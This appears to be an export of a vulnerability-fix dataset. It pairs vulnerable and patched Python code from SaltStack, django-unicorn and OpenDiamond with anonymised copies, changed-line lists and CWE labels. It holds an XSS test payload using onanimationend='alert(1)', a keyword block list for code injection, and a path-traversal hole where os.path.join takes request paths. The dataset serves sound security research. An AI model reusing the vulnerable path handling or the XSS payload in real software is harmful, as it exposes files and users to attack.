for tpath in FUNC_6(VAR_11):
if not VAR_54.access(tpath, VAR_54.R_OK):
VAR_32 = 'Could not access {0}.'.format(tpath)
if not VAR_54.path.exists(tpath):
VAR_32 += ' Path does not exist.'
else:
VAR_34 = salt.utils.get_user()
if VAR_6 != VAR_34:
VAR_32 += ' Try running as VAR_6 {0}.'.format(VAR_6)
else:
VAR_32 += ' Please give {0} read permissions.'.format(VAR_6)
if VAR_12:
return
raise SaltClientError(VAR_32)
def FUNC_8(VAR_13):
VAR_28 = VAR_13.get('max_open_files', 100000)
if sys.platform.startswith('win'):
VAR_46 = VAR_47 = win32file._getmaxstdio()
else:
VAR_46, VAR_47 = resource.getrlimit(resource.RLIMIT_NOFILE)
VAR_29 = VAR_54.path.join(VAR_13.get('pki_dir'), 'minions')
VAR_30 = len(VAR_54.listdir(VAR_29))
VAR_0.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
VAR_30
)
)
VAR_31 = logging.INFO
if (VAR_30 * 4) <= VAR_46:
return
VAR_32 = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open VAR_5 soft setting({1}). '.format(
VAR_30, VAR_46
)
)
if VAR_30 >= VAR_46:
VAR_32 += 'salt-master will crash pretty soon! '
VAR_31 = logging.CRITICAL
elif (VAR_30 * 2) >= VAR_46:
VAR_31 = logging.CRITICAL
elif (VAR_30 * 3) >= VAR_46:
VAR_31 = logging.WARNING
elif (VAR_30 * 4) >= VAR_46:
VAR_31 = logging.INFO
if VAR_28 < VAR_47:
VAR_32 += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(VAR_47 - VAR_28)
VAR_32 += 'Please consider raising this value.'
VAR_0.log(VAR_31=level, VAR_32=msg)
def FUNC_9(VAR_14, VAR_11, VAR_15=False):
if not VAR_54.path.isabs(VAR_14):
return ''
if not VAR_54.path.isabs(VAR_11):
VAR_11 = VAR_54.path.join(VAR_14, VAR_11)
VAR_11 = VAR_54.path.normpath(VAR_11)
if VAR_15:
if VAR_11.startswith(VAR_14):
return VAR_11
else:
if VAR_54.path.dirname(VAR_11) == VAR_54.path.normpath(VAR_14):
return VAR_11
return ''
def FUNC_10(VAR_13, VAR_16):
try:
if any(x in VAR_16 for x in ('/', '\\', '\0')):
return False
return bool(FUNC_9(VAR_13['pki_dir'], VAR_16))
except (AttributeError, KeyError, TypeError):
return False
def FUNC_11(VAR_17):
VAR_33 = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in VAR_33:
if VAR_17.count(bad):
return False
return True
def FUNC_12(VAR_13):
VAR_31 = LOG_LEVELS.get(str(VAR_13.get('log_level')).lower(), logging.NOTSET)
if VAR_31 < logging.INFO:
VAR_0.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def FUNC_13(VAR_7, VAR_8=False, VAR_9='', VAR_10=False):
import salt.utils.win_functions
import salt.utils.win_dacl
VAR_11 = VAR_7[0]
while VAR_54.path.basename(VAR_11) not in ['salt', 'salt-tests-tmpdir']:
VAR_11, VAR_48 = VAR_54.path.split(VAR_11)
if not VAR_54.path.isdir(VAR_11):
VAR_54.makedirs(VAR_11)
VAR_34 = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(VAR_34):
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
except CommandExecutionError:
VAR_32 = 'Unable to securely set the owner of "{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if not VAR_8:
try:
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(VAR_11, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of ' \
'"{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_54.makedirs(dir_)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
if dir_ == VAR_9:
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(dir_, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
| [
1,
6,
7,
8,
9,
17,
18,
23,
24,
31,
33,
34,
42,
45,
46,
48,
49,
57,
59,
64,
65,
68,
70,
82,
83,
94,
95,
101,
113,
114,
119,
140,
142,
143,
159,
172,
181,
185,
193,
194,
208,
221,
229,
231,
236,
237,
240,
259,
268,
270,
271,
272,
273,
274,
275,
276,
277,
278,
291,
293,
295,
296,
315,
316,
317,
320,
323,
327,
344,
345,
349,
353,
361,
365,
369,
370,
385,
386,
391,
392,
393,
394,
397,
398,
400,
401,
408,
409,
410,
414,
417,
423,
425,
427,
428,
429,
430,
431,
433,
440,
442,
446,
450,
453,
458,
461,
462,
481,
482,
490,
491,
500,
501,
521,
522,
528,
531,
532,
540,
541,
545,
546,
549,
550,
554,
555,
557,
564,
567,
569,
570,
571,
574,
577,
580,
581,
583,
591,
592,
603,
604,
607,
609,
610,
611,
613,
614,
615,
618,
621,
624,
625,
627,
635,
637,
639,
2,
3,
4,
36,
37,
38,
97,
98,
99,
100,
116,
117,
118,
145,
146,
147,
196,
197,
198,
199,
298,
299,
300,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
372,
373,
374,
375,
376,
377,
403,
404,
405,
464,
465,
466,
467,
468,
484,
485,
486,
493,
494,
495,
503,
504,
505,
506,
507,
524,
525,
526,
534,
535,
536,
537
] | [
1,
6,
7,
8,
9,
17,
18,
23,
24,
31,
33,
34,
42,
45,
46,
48,
49,
57,
59,
64,
65,
68,
70,
82,
83,
94,
95,
101,
113,
114,
119,
140,
142,
143,
159,
172,
181,
185,
193,
194,
208,
221,
229,
231,
236,
237,
240,
259,
268,
270,
271,
272,
273,
274,
275,
276,
277,
278,
291,
293,
295,
296,
315,
316,
317,
320,
323,
327,
344,
345,
349,
353,
361,
365,
369,
370,
385,
386,
391,
392,
393,
394,
397,
398,
400,
401,
408,
409,
410,
414,
417,
423,
425,
427,
428,
429,
430,
431,
433,
440,
442,
446,
450,
453,
458,
461,
462,
481,
482,
493,
494,
514,
515,
521,
524,
525,
533,
534,
538,
539,
542,
543,
547,
548,
550,
557,
560,
562,
563,
564,
567,
570,
573,
574,
576,
584,
585,
596,
597,
600,
602,
603,
604,
606,
607,
608,
611,
614,
617,
618,
620,
628,
630,
632,
2,
3,
4,
36,
37,
38,
97,
98,
99,
100,
116,
117,
118,
145,
146,
147,
196,
197,
198,
199,
298,
299,
300,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
372,
373,
374,
375,
376,
377,
403,
404,
405,
464,
465,
466,
467,
468,
484,
485,
486,
496,
497,
498,
499,
500,
517,
518,
519,
527,
528,
529,
530
] |
1CWE-79
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import get_root_element
def test_get_root_element():
expected = "<div>test</div>"
component_html = "<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_comment():
expected = "<div>test</div>"
component_html = "<!-- some comment --><div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_blank_string():
expected = "<div>test</div>"
component_html = "\n<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_no_element():
expected = "<div>test</div>"
component_html = "\n"
soup = BeautifulSoup(component_html, features="html.parser")
with pytest.raises(Exception):
actual = get_root_element(soup)
assert str(actual) == expected
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import (
UnicornTemplateResponse,
get_root_element,
)
def test_get_root_element():
expected = "<div>test</div>"
component_html = "<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_comment():
expected = "<div>test</div>"
component_html = "<!-- some comment --><div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_with_blank_string():
expected = "<div>test</div>"
component_html = "\n<div>test</div>"
soup = BeautifulSoup(component_html, features="html.parser")
actual = get_root_element(soup)
assert str(actual) == expected
def test_get_root_element_no_element():
expected = "<div>test</div>"
component_html = "\n"
soup = BeautifulSoup(component_html, features="html.parser")
with pytest.raises(Exception):
actual = get_root_element(soup)
assert str(actual) == expected
def test_desoupify():
html = "<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\n</div>\n\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
expected = "<div><a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>!\n</div>\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
soup = BeautifulSoup(html, "html.parser")
actual = UnicornTemplateResponse._desoupify(soup)
assert expected == actual
| xss | {
"code": [
"from django_unicorn.components.unicorn_template_response import get_root_element"
],
"line_no": [
4
]
} | {
"code": [
"from django_unicorn.components.unicorn_template_response import (",
" get_root_element,",
")",
"def test_desoupify():",
" html = \"<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\\n</div>\\n\\n<script type=\\\"application/javascript\\\">\\n window.addEventListener('DOMContentLoaded', (event) => {\\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\\n });\\n</script>\"",
" expected = \"<div><a><style>@keyframes x{}</style><a style=\\\"animation-name:x\\\" onanimationend=\\\"alert(1)\\\"></a>!\\n</div>\\n<script type=\\\"application/javascript\\\">\\n window.addEventListener('DOMContentLoaded', (event) => {\\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\\n });\\n</script>\"",
" soup = BeautifulSoup(html, \"html.parser\")",
" actual = UnicornTemplateResponse._desoupify(soup)",
" assert expected == actual"
],
"line_no": [
4,
6,
7,
52,
53,
54,
56,
58,
60
]
} | import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import get_root_element
def FUNC_0():
VAR_0 = "<div>test</div>"
VAR_1 = "<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_1():
VAR_0 = "<div>test</div>"
VAR_1 = "<!-- some comment --><div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_2():
VAR_0 = "<div>test</div>"
VAR_1 = "\n<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_3():
VAR_0 = "<div>test</div>"
VAR_1 = "\n"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
with pytest.raises(Exception):
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
| import pytest
from bs4 import BeautifulSoup
from django_unicorn.components.unicorn_template_response import (
UnicornTemplateResponse,
get_root_element,
)
def FUNC_0():
VAR_0 = "<div>test</div>"
VAR_1 = "<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_1():
VAR_0 = "<div>test</div>"
VAR_1 = "<!-- some comment --><div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_2():
VAR_0 = "<div>test</div>"
VAR_1 = "\n<div>test</div>"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_3():
VAR_0 = "<div>test</div>"
VAR_1 = "\n"
VAR_2 = BeautifulSoup(VAR_1, features="html.parser")
with pytest.raises(Exception):
VAR_3 = get_root_element(VAR_2)
assert str(VAR_3) == VAR_0
def FUNC_4():
VAR_4 = "<div><a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>!\n</div>\n\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
VAR_0 = "<div><a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>!\n</div>\n<script type=\"application/javascript\">\n window.addEventListener('DOMContentLoaded', (event) => {\n Unicorn.addEventListener('updated', (component) => console.log('got updated', component));\n });\n</script>"
VAR_2 = BeautifulSoup(VAR_4, "html.parser")
VAR_3 = UnicornTemplateResponse._desoupify(VAR_2)
assert VAR_0 == VAR_3
| [
3,
5,
6,
9,
13,
15,
16,
19,
23,
25,
26,
29,
33,
35,
36,
39,
42,
45,
47
] | [
3,
8,
9,
12,
16,
18,
19,
22,
26,
28,
29,
32,
36,
38,
39,
42,
45,
48,
50,
51,
55,
57,
59,
61
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
BASEURL = 'cocktail'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = config.indexdir
DATAROOT = config.dataroot
scope_blueprint = Blueprint('mixer_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
print("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
print("Enter Scope")
sys.stdout.flush()
base_list = []
seed, percentage = decode_params(params)
if baseidx != "0":
base_index = _get_index_absolute_path('GIDIDX' + baseidx.upper())
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if limit > 0:
base_list = base_list[start:start+limit]
elif start > 0:
base_list = base_list[start:]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.0001
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
return class_paths
mixer_list = []
class_paths = get_class_path()
print("Class paths : {}".format(class_paths))
sys.stdout.flush()
if class_paths:
for path in class_paths:
print("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
mixer_list.extend(sorted(glob.glob(os.path.join(path, "*.jpg"))))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return os.path.join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return os.path.join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
BASEURL = 'cocktail'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = config.indexdir
DATAROOT = config.dataroot
scope_blueprint = Blueprint('mixer_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
print("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
print("Enter Scope")
sys.stdout.flush()
base_list = []
seed, percentage = decode_params(params)
if baseidx != "0":
base_index = _get_index_absolute_path('GIDIDX' + baseidx.upper())
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if limit > 0:
base_list = base_list[start:start+limit]
elif start > 0:
base_list = base_list[start:]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.0001
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
return class_paths
mixer_list = []
class_paths = get_class_path()
print("Class paths : {}".format(class_paths))
sys.stdout.flush()
if class_paths:
for path in class_paths:
print("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
mixer_list.extend(sorted(glob.glob(os.path.join(path, "*.jpg"))))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return safe_join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| path_disclosure | {
"code": [
" return os.path.join(DATAROOT, obj_path)",
" return os.path.join(INDEXDIR, index)"
],
"line_no": [
252,
256
]
} | {
"code": [
" return safe_join(DATAROOT, obj_path)"
],
"line_no": [
253
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
VAR_0 = 'cocktail'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_34, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_29/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = VAR_6.indexdir
